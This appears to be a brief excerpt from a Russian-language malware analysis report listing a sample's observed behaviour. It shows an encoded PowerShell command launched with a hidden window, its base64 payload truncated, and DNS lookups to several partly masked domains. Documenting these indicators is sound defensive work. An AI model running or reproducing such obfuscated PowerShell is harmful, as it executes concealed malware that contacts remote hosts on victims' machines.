Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABEAEkAaQBNAE0AdwBkAFAAPQAnAHAAdwA3ADkAVQBWADUATgAnADsAJAByADgAOQBCAHEAdgA5AE0AIAA9ACAAJwA1ADIAMwAnADsAJAB6ADEAbwBaAGkARABqAD0AJwBPAGwAXwBxAG0ARQBDACcAOwAkAEwAagA2AEoAbABMAEgAegA9ACQAZQ...
- DNS ASK sh##l.org
- DNS ASK lo#####azionesavarra.it
- DNS ASK he###nmode.tk
- DNS ASK nf##o.com
- DNS ASK en####isrope.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABEAEkAaQBNAE0AdwBkAFAAPQAnAHAAdwA3ADkAVQBWADUATgAnADsAJAByADgAOQBCAHEAdgA5AE0AIAA9ACAAJwA1ADIAMwAnADsAJAB6ADEAbwBaAGkARABqAD0AJwBPAGwAXwBxAG0ARQBDACcAOwAkAEwAagA2AEoAbABMAEgAegA9ACQAZQ...' (со скрытым окном)